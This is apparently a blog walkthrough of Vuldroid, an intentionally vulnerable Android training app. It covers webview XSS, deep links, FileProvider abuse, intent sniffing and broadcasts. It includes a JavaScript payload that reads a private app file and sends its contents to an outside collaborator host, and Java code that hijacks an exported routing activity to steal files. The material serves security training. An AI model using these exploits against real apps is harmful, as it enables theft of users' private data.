[UPDATED]Vuldroid App Walkthrough

  • Steal Password ResetTokens/MagicLoginLinks
  • Webview Xss via Exported Activity
  • Webview Xss via DeepLink
  • Stealing Files via Webview
  • Stealing Files via Fileprovider
  • Intent Sniffing Between Two Applications
  • Reading User Email via Broadcasts
  • Command Execution via Malicious App
Manifest File
<intent-filter android:autoVerify="true">
Deeplink Xss
<!DOCTYPE html>
<html>
<body>
<h1>File Sent to Server</h1>
<script>
function sendmefiles(filepath, url){
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
var upload = new XMLHttpRequest();
upload.open("GET", url + "?" + this.responseText , false)
upload.send()
};
xhttp.open("GET", filepath, false);
xhttp.send();
}
window.onload=sendmefiles("file:///data/user/0/com.vuldroid.application/files/example.txt", "https://burpcollaborator.com")
</script>
</body>
</html>
http://medium.com?url=file:///exploit.html
Intent extra = new Intent();
extra.setFlags(Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION | Intent.FLAG_GRANT_PREFIX_URI_PERMISSION | Intent.FLAG_GRANT_READ_URI_PERMISSION | Intent.FLAG_GRANT_WRITE_URI_PERMISSION);
extra.setClassName(getPackageName(), "com.notify.vuldroidexploit.FileStealDisplay");
extra.setData(Uri.parse("content://com.vuldroid.application.provider/"));

Intent intent = new Intent();
intent.setClassName("com.vuldroid.application", "com.vuldroid.application.RoutingActivity");
intent.putExtra("router_component", extra);
startActivity(intent);
TextView t1=findViewById(R.id.filestealv);
Uri uri = Uri.parse(getIntent().getDataString() + "root/data/data/com.vuldroid.application/files/example.txt");

try {
InputStream i = getContentResolver().openInputStream(uri);
InputStreamReader isReader = new InputStreamReader(i);
BufferedReader reader = new BufferedReader(isReader);
StringBuffer sb = new StringBuffer();
String str;
while((str = reader.readLine())!= null){
t1.setText(str);
i.close();
}

}catch (FileNotFoundException e) {
e.printStackTrace();
} catch (IOException e) {
e.printStackTrace();
}
Sender File
Reciever Ends
Broadcast receiver

--

--

--

Security is Fun

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

New Android Libraries and Talks

Understanding Android Scopes with Koin

How to edit hosts file in Android emulator

Fast Lane from Dagger2 to Hilt — Dependancy Injection

ML with Android

How to name a color in Android

Setting permanent Android PATHs on Linux

How To Use RecyclerView in Android

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Akshansh JaisWal

Akshansh JaisWal

Security is Fun

More from Medium

RCE in .tgz file upload

android webview side channel attack

Nanobrok — Web Service For Control And Protect Your Android Device Remotely

Interesting Stored XSS